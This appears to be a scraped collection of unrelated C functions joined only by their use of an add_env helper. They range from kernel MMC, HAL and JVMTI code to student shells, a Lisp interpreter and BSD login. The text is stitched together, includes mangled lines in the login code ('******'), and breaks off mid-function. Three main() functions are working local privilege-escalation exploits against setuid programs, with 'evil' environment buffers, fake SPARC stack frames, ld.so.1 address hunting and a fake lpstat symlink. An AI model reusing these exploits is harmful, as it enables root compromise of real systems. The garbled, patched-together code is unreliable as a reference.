static int
mmc_bus_uevent(struct device *dev, char **envp, int num_envp, char *buf,
int buf_size)
{
struct mmc_card *card = dev_to_mmc_card(dev);
int retval = 0, i = 0, length = 0;
#define add_env(fmt,val) do { \
retval = add_uevent_var(envp, num_envp, &i, \
buf, buf_size, &length, \
fmt, val); \
if (retval) \
return retval; \
} while (0);
switch (card->type) {
case MMC_TYPE_MMC:
add_env("MMC_TYPE=%s", "MMC");
break;
case MMC_TYPE_SD:
add_env("MMC_TYPE=%s", "SD");
break;
}
add_env("MMC_NAME=%s", mmc_card_name(card));
#undef add_env
envp[i] = NULL;
return 0;
}
static int
mmc_bus_hotplug(struct device *dev, char **envp, int num_envp, char *buf,
int buf_size)
{
struct mmc_card *card = dev_to_mmc_card(dev);
char ccc[13];
int i = 0;
#define add_env(fmt,val) \
({ \
int len, ret = -ENOMEM; \
if (i < num_envp) { \
envp[i++] = buf; \
len = snprintf(buf, buf_size, fmt, val) + 1; \
buf_size -= len; \
buf += len; \
if (buf_size >= 0) \
ret = 0; \
} \
ret; \
})
for (i = 0; i < 12; i++)
ccc[i] = card->csd.cmdclass & (1 << i) ? '1' : '0';
ccc[12] = '\0';
i = 0;
add_env("MMC_CCC=%s", ccc);
add_env("MMC_MANFID=%06x", card->cid.manfid);
add_env("MMC_NAME=%s", mmc_card_name(card));
add_env("MMC_OEMID=%04x", card->cid.oemid);
return 0;
}
char cd_home(t_arg *targ)
{
int i;
char *str3;
if (targ->wtab[1] == NULL)
{
if ((i = find_env(targ->env, "PWD=")) < 0)
if ((targ->env = add_env(targ->env, "PWD", '=', "/")) == NULL)
return (1);
if ((i = find_env(targ->env, "HOME=")) < 0)
if ((targ->env = add_env(targ->env, "HOME", '=', "/")) == NULL)
return (1);
if ((targ->pwd = get_flagss(targ->env, "PWD")) == NULL ||
(i = find_env(targ->env, "PWD=")) < 0)
return (1);
if ((str3 = get_flagss(targ->env, "HOME")) == NULL ||
(targ->env[i] = concat_str("PWD", '=', str3)) == NULL ||
(chdir(str3) < 0))
return (1);
free(str3);
return (2);
}
return (0);
}
ndmp9_error
ndmda_data_start_backup (struct ndm_session *sess)
{
struct ndm_data_agent * da = sess->data_acb;
ndmp9_error error = NDMP9_NO_ERR;
char cmd[NDMDA_MAX_CMD];
strcpy (cmd, "wrap_");
strcat (cmd, da->bu_type);
if (sess->param->log_level > 0) {
char tmpbuf[40];
sprintf(tmpbuf, "-d%d", sess->param->log_level);
ndmda_add_to_cmd (cmd, tmpbuf);
}
ndmda_add_to_cmd (cmd, "-c");
ndmda_add_to_cmd (cmd, "-I#3");
add_env (&da->env_tab, cmd);
ndma_send_logmsg (sess, NDMP9_LOG_DEBUG, sess->plumb.data,
"CMD: %s", cmd);
if (ndmda_pipe_fork_exec (sess, cmd, 1) < 0) {
return NDMP9_UNDEFINED_ERR;
}
ndmis_data_start (sess, NDMCHAN_MODE_WRITE);
da->data_state.state = NDMP9_DATA_STATE_ACTIVE;
da->data_state.operation = NDMP9_DATA_OP_BACKUP;
return error;
}
char mysh_cd(t_arg *targ, UNUSED char *path)
{
int i;
if ((i = cd_tiret(targ)) == 1)
return (1);
if (i != 2 && !access(targ->wtab[1], F_OK))
{
if (!access(targ->wtab[1], R_OK))
{
if ((i = find_env(targ->env, "PWD=")) < 0)
if ((targ->env = add_env(targ->env, "PWD", '=', "/")) == NULL)
return (1);
if ((targ->pwd = get_flagss(targ->env,"PWD")) == NULL ||
((i = find_env(targ->env, "PWD=")) < 0))
return (1);
free(targ->env[i]);
if ((targ->env[i] = concat_str("PWD", '=', targ->wtab[1])) == NULL
|| chdir(targ->wtab[1]) < 0)
return (1);
}
else
write(2, "Error while accessing path, no rights.\n", 40);
}
else if (i != 2)
write(2, "No such file or directory.\n", 28);
return (0);
}
void my_set_env(t_mysh *mysh)
{
char *param_in_env;
int i;
i = 0;
while (mysh->tab_com[i])
i++;
if (comp_str(mysh->tab_com[0], "setenv") == 1 && mysh->tab_com[1] && i < 4)
{
if ((param_in_env = src_env(mysh->env, mysh->tab_com[1])))
update_env(mysh);
else
add_env(mysh);
if (param_in_env)
free (param_in_env);
}
else if (comp_str(mysh->tab_com[0], "setenv") == 1 && i == 1)
{
i = -1;
while (mysh->env && mysh->env[++i])
my_printf("%s\n", mysh->env[i]);
}
else if (comp_str(mysh->tab_com[0], "setenv") == 1 && i >= 4)
my_error("setenv: Too many arguments.\n");
}
ndmp9_error
ndmda_data_start_recover_fh (struct ndm_session *sess)
{
struct ndm_data_agent * da = sess->data_acb;
ndmp9_error error = NDMP9_NO_ERR;
char cmd[NDMDA_MAX_CMD];
strcpy (cmd, "wrap_");
strcat (cmd, da->bu_type);
ndmda_add_to_cmd (cmd, "-t");
ndmda_add_to_cmd (cmd, "-I#3");
add_env (&da->env_tab, cmd);
add_nlist (&da->nlist_tab, cmd);
ndma_send_logmsg (sess, NDMP9_LOG_DEBUG, sess->plumb.data,
"CMD: %s", cmd);
if (ndmda_pipe_fork_exec (sess, cmd, 0) < 0) {
return NDMP9_UNDEFINED_ERR;
}
ndmis_data_start (sess, NDMCHAN_MODE_READ);
da->data_state.state = NDMP9_DATA_STATE_ACTIVE;
da->data_state.operation = NDMP9_DATA_OP_RECOVER_FILEHIST;
return error;
}
void ft_setenv(char **env, char *name, char *value)
{
int i;
int j;
int g;
char *e_title;
i = 0;
g = 0;
while (env[i])
{
j = 0;
while (env[i][j] != '\0' && env[i][j] != '=')
j++;
if (env[i][j] != '\0')
{
e_title = ft_strsub(env[i], 0, j);
if (ft_strcmp(e_title, name) == 0)
{
set_env(env, i, j, value);
g++;
}
ft_memdel((void **)&e_title);
}
i++;
}
if (g == 0)
add_env(env, i, name, value);
}
static void
add_basic_env(DBusMessageIter *iter, const gchar *udi) {
struct utsname un;
char *server_addr;
if (hald_is_verbose) {
add_env(iter, "HALD_VERBOSE", "1");
}
if (hald_is_initialising) {
add_env(iter, "HALD_STARTUP", "1");
}
if (hald_use_syslog) {
add_env(iter, "HALD_USE_SYSLOG", "1");
}
add_env(iter, "UDI", udi);
server_addr = hald_dbus_local_server_addr();
add_env(iter, "HALD_DIRECT_ADDR", server_addr);
dbus_free (server_addr);
#ifdef HAVE_POLKIT
add_env(iter, "HAVE_POLKIT", "1");
#endif
if (uname(&un) >= 0) {
char *sysname;
sysname = g_ascii_strdown(un.sysname, -1);
add_env(iter, "HALD_UNAME_S", sysname);
g_free(sysname);
}
}
JvmtiThreadState::JvmtiThreadState(JavaThread* thread)
: _thread_event_enable() {
assert(JvmtiThreadState_lock->is_locked(), "sanity check");
_thread = thread;
_exception_detected = false;
_exception_caught = false;
_debuggable = true;
_hide_single_stepping = false;
_hide_level = 0;
_pending_step_for_popframe = false;
_class_being_redefined = NULL;
_class_load_kind = jvmti_class_load_kind_load;
_head_env_thread_state = NULL;
_dynamic_code_event_collector = NULL;
_vm_object_alloc_event_collector = NULL;
_the_class_for_redefinition_verification = NULL;
_scratch_class_for_redefinition_verification = NULL;
_cur_stack_depth = UNKNOWN_STACK_DEPTH;
// JVMTI ForceEarlyReturn support
_pending_step_for_earlyret = false;
_earlyret_state = earlyret_inactive;
_earlyret_tos = ilgl;
_earlyret_value.j = 0L;
_earlyret_oop = NULL;
// add all the JvmtiEnvThreadState to the new JvmtiThreadState
{
JvmtiEnvIterator it;
for (JvmtiEnvBase* env = it.first(); env != NULL; env = it.next(env)) {
if (env->is_valid()) {
add_env(env);
}
}
}
// link us into the list
{
// The thread state list manipulation code must not have safepoints.
// See periodic_clean_up().
debug_only(No_Safepoint_Verifier nosafepoint;)
_prev = NULL;
_next = _head;
if (_head != NULL) {
_head->_prev = this;
}
_head = this;
}
int change_env(t_duo **env, char *name, char *value)
{
t_duo *cpy;
cpy = *env;
while (cpy)
{
if (ft_strcmp(cpy->name, name) == 0)
{
free(cpy->value);
cpy->value = ft_strdup(value);
return (1);
}
cpy = cpy->next;
}
add_env(env, name, value);
free(cpy);
return (0);
}
Obj *apply(Env *env, Obj *root, Obj **fn, Obj **args) {
if ((*fn)->type == TPRIMITIVE) {
if ((*args) != Nil && (*args)->type != TCELL)
error("argument must be a list");
return (*fn)->fn(env, root, args);
}
if ((*fn)->type == TFUNCTION) {
VAR(body);
VAR(params);
VAR(eargs);
*body = (*fn)->body;
*params = (*fn)->params;
Env newenv;
*eargs = eval_list(env, root, args);
add_env(env, root, &newenv, params, eargs);
return progn(&newenv, root, body);
}
error("not supported");
return NULL;
}
Obj *macroexpand(Env *env, Obj *root, Obj **obj) {
if ((*obj)->type != TCELL || (*obj)->car->type != TSYMBOL)
return *obj;
VAR(macro);
VAR(args);
VAR(body);
VAR(params);
*macro = find((*obj)->car->name, env);
if (!*macro)
return *obj;
*macro = (*macro)->cdr;
if ((*macro)->type != TMACRO)
return *obj;
*args = (*obj)->cdr;
*body = (*macro)->body;
*params = (*macro)->params;
Env newenv;
add_env(env, root, &newenv, params, args);
return progn(&newenv, root, body);
}
static int
krb5_start_session (const struct passwd *pwd)
{
krb5_error_code ret;
char residual[64];
/* copy credentials to file cache */
snprintf(residual, sizeof(residual), "FILE:/tmp/krb5cc_%u",
(unsigned)pwd->pw_uid);
krb5_cc_resolve(context, residual, &id2);
ret = krb5_cc_copy_cache(context, id, id2);
if (ret == 0)
add_env("KRB5CCNAME", residual);
else {
krb5_cc_destroy (context, id2);
return ret;
}
krb5_cc_close(context, id2);
krb5_cc_destroy(context, id);
return 0;
}
char cd_tiret(t_arg *targ)
{
char *tmp;
int i;
if (targ->wtab[1] != NULL &&
!my_strncmp(targ->wtab[1], "-", 1) && targ->pwd != NULL)
{
tmp = targ->pwd;
if ((i = find_env(targ->env, "PWD=")) < 0)
if ((targ->env = add_env(targ->env, "PWD", '=', "/")) == NULL)
return (1);
if ((targ->pwd = get_flagss(targ->env, "PWD")) == NULL)
return (1);
free(targ->env[i]);
if ((targ->env[i] = concat_str("PWD", '=', tmp)) == NULL ||
chdir(tmp) < 0)
return (1);
return (2);
}
return (cd_home(targ));
}
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE];
char platform[256], release[256], display[256];
int i, offset, ret, var1_addr, var2_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "DTHELPSEARCHPATH=", 17);
/* prepare the evil env vars */
memset(var1, 'B', sizeof(var1));
var1[sizeof(var1) - 1] = 0x0;
memset(var2, 'C', sizeof(var2));
var2[sizeof(var2) - 1] = 0x0;
/* fill the envp, keeping padding */
var1_addr = add_env(sc);
var2_addr = add_env(var1);
add_env(var2);
add_env(display);
add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin");
add_env("HOME=/tmp");
add_env(buf);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ret = sb - offset + arg_len;
var1_addr += ret;
var2_addr += ret;
/* fill the evil buffer */
for (i = 17; i < BUFSIZE - 8; i += 4)
set_val(buf, i, var1_addr - 5000);
/* fill the evil env vars */
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var1, i, var2_addr - 500);
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var2, i, ret);
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr);
fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr);
fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
int
main(int argc, char **argv)
{
int max_tries = 5;
int try;
char username[32];
int optidx = 0;
int ask = 1;
struct sigaction sa;
setprogname(argv[0]);
#ifdef KRB5
{
krb5_error_code ret;
ret = krb5_init_context(&context);
if (ret)
errx (1, "krb5_init_context failed: %d", ret);
}
#endif
openlog("login", LOG_ODELAY | LOG_PID, LOG_AUTH);
if (getarg (args, sizeof(args) / sizeof(args[0]), argc, argv,
&optidx))
usage (1);
argc -= optidx;
argv += optidx;
if(help_flag)
usage(0);
if (version_flag) {
print_version (NULL);
return 0;
}
if (geteuid() != 0)
errx(1, "only root may use login, use su");
/* Default tty settings. */
stty_default();
if(p_flag)
copy_env();
else {
/* this set of variables is always preserved by BSD login */
if(getenv("TERM"))
add_env("TERM", getenv("TERM"));
if(getenv("TZ"))
add_env("TZ", getenv("TZ"));
}
if(*argv){
if(strchr(*argv, '=') == NULL && strcmp(*argv, "-") != 0){
strlcpy (username, *argv, sizeof(username));
ask = 0;
}
}
#if defined(DCE) && defined(AIX)
esetenv("AUTHSTATE", "DCE", 1);
#endif
/* XXX should we care about environment on the command line? */
memset(&sa, 0, sizeof(sa));
sa.sa_handler = sig_handler;
sigemptyset(&sa.sa_mask);
sa.sa_flags = 0;
sigaction(SIGALRM, &sa, NULL);
alarm(login_timeout);
for(try = 0; try < max_tries; try++){
struct passwd *pwd;
char password[128];
int ret;
char ttname[32];
char *tty, *ttyn;
char prompt[128];
#ifdef OTP
char otp_str[256];
#endif
if(ask){
f_flag = 0;
#if 0
r_flag = 0;
#endif
ret = read_string("login: "******"");
}
else
#endif
{
#ifdef OTP
if(auth_level && strcmp(auth_level, "otp") == 0 &&
otp_challenge(&otp_ctx, username,
otp_str, sizeof(otp_str)) == 0)
snprintf (prompt, sizeof(prompt), "%s's %s Password: "******"Password: "******"Login incorrect.\n");
ask = 1;
continue;
}
if(f_flag == 0 && check_password(pwd, password)){
fprintf(stderr, "Login incorrect.\n");
ask = 1;
continue;
}
ttyn = ttyname(STDIN_FILENO);
if(ttyn == NULL){
snprintf(ttname, sizeof(ttname), "%s??", _PATH_TTY);
ttyn = ttname;
}
if (strncmp (ttyn, _PATH_DEV, strlen(_PATH_DEV)) == 0)
tty = ttyn + strlen(_PATH_DEV);
else
tty = ttyn;
if (login_access (pwd, remote_host ? remote_host : tty) == 0) {
fprintf(stderr, "Permission denied\n");
if (remote_host)
syslog(LOG_NOTICE, "%s LOGIN REFUSED FROM %s",
pwd->pw_name, remote_host);
else
syslog(LOG_NOTICE, "%s LOGIN REFUSED ON %s",
pwd->pw_name, tty);
exit (1);
} else {
if (remote_host)
syslog(LOG_NOTICE, "%s LOGIN ACCEPTED FROM %s ppid=%d",
pwd->pw_name, remote_host, (int) getppid());
else
syslog(LOG_NOTICE, "%s LOGIN ACCEPTED ON %s ppid=%d",
pwd->pw_name, tty, (int) getppid());
}
alarm(0);
do_login(pwd, tty, ttyn);
}
exit(1);
}
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE];
char platform[256], release[256], display[256];
int i, offset, ff_addr, sc_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int ret, rwx_mem;
/* get the stack base */
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(2);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* get the address of strcpy() or sprintf() in ld.so.1 */
ret = (rel < 10 ? search_ldso("strcpy") : search_ldso("sprintf"));
/* get the address of RWX memory segment inside ld.so.1 */
rwx_mem = search_rwx_mem();
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "_XKB_CHARSET=", 13);
/* prepare the evil env var */
memset(var, 'B', sizeof(var));
var[sizeof(var) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to function */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to function */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
sc_addr = add_env(ff);
add_env(sc);
add_env(display);
add_env(buf);
add_env(var);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ff_addr = sb - offset + arg_len;
sc_addr += ff_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to function */
/* fill the evil buffer */
for (i = 13 + 256; i < 13 + 256 + 56; i += 4)
set_val(buf, i, sb - 2048);
/* we don't need to bruteforce */
set_val(buf, 13 + 256 + 56, ff_addr); /* fake frame address */
set_val(buf, 13 + 256 + 60, ret - 4); /* function, after the save */
/* fill the evil env var */
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var, i, sb - 2048);
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using function address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], ff[FFSIZE], ret_var[16], fpt_var[16];
char platform[256], release[256], display[256];
int i, offset, ff_addr, sc_addr, ret_pos, fpt_pos;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem();
/* fake lpstat code */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* get ret and fake frame addresses from environment */
ret = (int)strtoul(getenv("RET"), (char **)NULL, 0);
ff_addr = (int)strtoul(getenv("FPT"), (char **)NULL, 0);
/* prepare the evil printer name */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
/* fill with return and fake frame addresses */
for (i = 0; i < BUFSIZE; i += 4) {
/* apparently, we don't need to bruteforce */
set_val(buf, i, ret - 4);
set_val(buf, i += 4, ff_addr);
}
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for %s: /dev/null\n", buf);
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: %s\n", buf);
}
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
sc_addr = add_env(ff);
add_env(sc);
ret_pos = env_pos;
add_env("RET=0x41414141");
fpt_pos = env_pos;
add_env("FPT=0x42424242");
add_env(display);
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ff_addr = sb - offset + arg_len;
sc_addr += ff_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* overwrite RET and FPT env vars with the right addresses */
sprintf(ret_var, "RET=0x%x", ret);
env[ret_pos] = ret_var;
sprintf(fpt_var, "FPT=0x%x", ff_addr);
env[fpt_pos] = fpt_var;
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
static void
do_login(const struct passwd *pwd, char *tty, char *ttyn)
{
#ifdef HAVE_GETSPNAM
struct spwd *sp;
#endif
int rootlogin = (pwd->pw_uid == 0);
gid_t tty_gid;
struct group *gr;
const char *home_dir;
int i;
if(!rootlogin)
checknologin();
#ifdef HAVE_GETSPNAM
sp = getspnam(pwd->pw_name);
#endif
update_utmp(pwd->pw_name, remote_host ? remote_host : "",
tty, ttyn);
gr = getgrnam ("tty");
if (gr != NULL)
tty_gid = gr->gr_gid;
else
tty_gid = pwd->pw_gid;
if (chown (ttyn, pwd->pw_uid, tty_gid) < 0) {
warn("chown %s", ttyn);
if (rootlogin == 0)
exit (1);
}
if (chmod (ttyn, S_IRUSR | S_IWUSR | S_IWGRP) < 0) {
warn("chmod %s", ttyn);
if (rootlogin == 0)
exit (1);
}
#ifdef HAVE_SETLOGIN
if(setlogin(pwd->pw_name)){
warn("setlogin(%s)", pwd->pw_name);
if(rootlogin == 0)
exit(1);
}
#endif
if(rootlogin == 0) {
const char *file = login_conf_get_string("limits");
if(file == NULL)
file = _PATH_LIMITS_CONF;
read_limits_conf(file, pwd);
}
#ifdef HAVE_SETPCRED
if (setpcred (pwd->pw_name, NULL) == -1)
warn("setpcred(%s)", pwd->pw_name);
#endif /* HAVE_SETPCRED */
#ifdef HAVE_INITGROUPS
if(initgroups(pwd->pw_name, pwd->pw_gid)){
warn("initgroups(%s, %u)", pwd->pw_name, (unsigned)pwd->pw_gid);
if(rootlogin == 0)
exit(1);
}
#endif
if(do_osfc2_magic(pwd->pw_uid))
exit(1);
if(setgid(pwd->pw_gid)){
warn("setgid(%u)", (unsigned)pwd->pw_gid);
if(rootlogin == 0)
exit(1);
}
if(setuid(pwd->pw_uid) || (pwd->pw_uid != 0 && setuid(0) == 0)) {
warn("setuid(%u)", (unsigned)pwd->pw_uid);
if(rootlogin == 0)
exit(1);
}
/* make sure signals are set to default actions, apparently some
OS:es like to ignore SIGINT, which is not very convenient */
for (i = 1; i < NSIG; ++i)
signal(i, SIG_DFL);
/* all kinds of different magic */
#ifdef HAVE_GETSPNAM
check_shadow(pwd, sp);
#endif
#if defined(HAVE_GETUDBNAM) && defined(HAVE_SETLIM)
{
struct udb *udb;
long t;
const long maxcpu = 46116860184; /* some random constant */
udb = getudbnam(pwd->pw_name);
if(udb == UDB_NULL)
errx(1, "Failed to get UDB entry.");
t = udb->ue_pcpulim[UDBRC_INTER];
if(t == 0 || t > maxcpu)
t = CPUUNLIM;
else
t *= 100 * CLOCKS_PER_SEC;
if(limit(C_PROC, 0, L_CPU, t) < 0)
warn("limit C_PROC");
t = udb->ue_jcpulim[UDBRC_INTER];
if(t == 0 || t > maxcpu)
t = CPUUNLIM;
else
t *= 100 * CLOCKS_PER_SEC;
if(limit(C_JOBPROCS, 0, L_CPU, t) < 0)
warn("limit C_JOBPROCS");
nice(udb->ue_nice[UDBRC_INTER]);
}
#endif
#if defined(HAVE_SGI_GETCAPABILITYBYNAME) && defined(HAVE_CAP_SET_PROC)
/* XXX SGI capability hack IRIX 6.x (x >= 0?) has something
called capabilities, that allow you to give away
permissions (such as chown) to specific processes. From 6.5
this is default on, and the default capability set seems to
not always be the empty set. The problem is that the
runtime linker refuses to do just about anything if the
process has *any* capabilities set, so we have to remove
them here (unless otherwise instructed by /etc/capability).
In IRIX < 6.5, these functions was called sgi_cap_setproc,
etc, but we ignore this fact (it works anyway). */
{
struct user_cap *ucap = sgi_getcapabilitybyname(pwd->pw_name);
cap_t cap;
if(ucap == NULL)
cap = cap_from_text("all=");
else
cap = cap_from_text(ucap->ca_default);
if(cap == NULL)
err(1, "cap_from_text");
if(cap_set_proc(cap) < 0)
err(1, "cap_set_proc");
cap_free(cap);
free(ucap);
}
#endif
home_dir = pwd->pw_dir;
if (chdir(home_dir) < 0) {
fprintf(stderr, "No home directory \"%s\"!\n", pwd->pw_dir);
if (chdir("/"))
exit(0);
home_dir = "/";
fprintf(stderr, "Logging in with home = \"/\".\n");
}
#ifdef KRB5
if (auth == AUTH_KRB5) {
krb5_start_session (pwd);
}
krb5_get_afs_tokens (pwd);
krb5_finish ();
#endif /* KRB5 */
add_env("PATH", _PATH_DEFPATH);
{
const char *str = login_conf_get_string("environment");
char buf[MAXPATHLEN];
if(str == NULL) {
login_read_env(_PATH_ETC_ENVIRONMENT);
} else {
while(strsep_copy(&str, ",", buf, sizeof(buf)) != -1) {
if(buf[0] == '\0')
continue;
login_read_env(buf);
}
}
}
{
const char *str = login_conf_get_string("motd");
char buf[MAXPATHLEN];
if(str != NULL) {
while(strsep_copy(&str, ",", buf, sizeof(buf)) != -1) {
if(buf[0] == '\0')
continue;
show_file(buf);
}
} else {
str = login_conf_get_string("welcome");
if(str != NULL)
show_file(str);
}
}
add_env("HOME", home_dir);
add_env("USER", pwd->pw_name);
add_env("LOGNAME", pwd->pw_name);
add_env("SHELL", pwd->pw_shell);
exec_shell(pwd->pw_shell, rootlogin);
}
static pid_t
start_child(struct stService *p, int fd, int tcp, int ipv6, int local_port, union sa *remote)
{
pid_t pid;
const char *proto = tcp ? "TCP" : "UDP";
#ifdef CONFIG_IPV6
char buf[INET6_ADDRSTRLEN];
#endif
init_env();
add_env("PROTO=%s", proto);
if (tcp) {
union sa local;
socklen_t local_size = sizeof(local);
#ifdef CONFIG_IPV6
if (ipv6) {
if (getsockname(fd, &local.sa, &local_size) == 0) {
add_env("TCPLOCALIP=%s", inet_ntop(AF_INET6, &local.sin6.sin6_addr, buf, sizeof(buf)));
}
else {
add_env("TCPLOCALIP=::");
}
add_env("TCPREMOTEIP=%s", inet_ntop(AF_INET6, &remote->sin6.sin6_addr, buf, sizeof(buf)));
add_env("%sREMOTEPORT=%d", proto, ntohs(remote->sin6.sin6_port));
} else
#endif
{
if (getsockname(fd, &local.sa, &local_size) == 0) {
add_env("TCPLOCALIP=%s", inet_ntoa(local.sin.sin_addr));
}
else {
add_env("TCPLOCALIP=0.0.0.0");
}
add_env("TCPREMOTEIP=%s", inet_ntoa(remote->sin.sin_addr));
add_env("%sREMOTEPORT=%d", proto, ntohs(remote->sin.sin_port));
}
}
add_env("%sLOCALPORT=%d", proto, local_port);
add_env("PATH=%s", getenv("PATH") ?: "/bin:/usr/bin:/sbin:/usr/sbin");
env_pointers[env_count] = 0;
#ifdef DEBUG
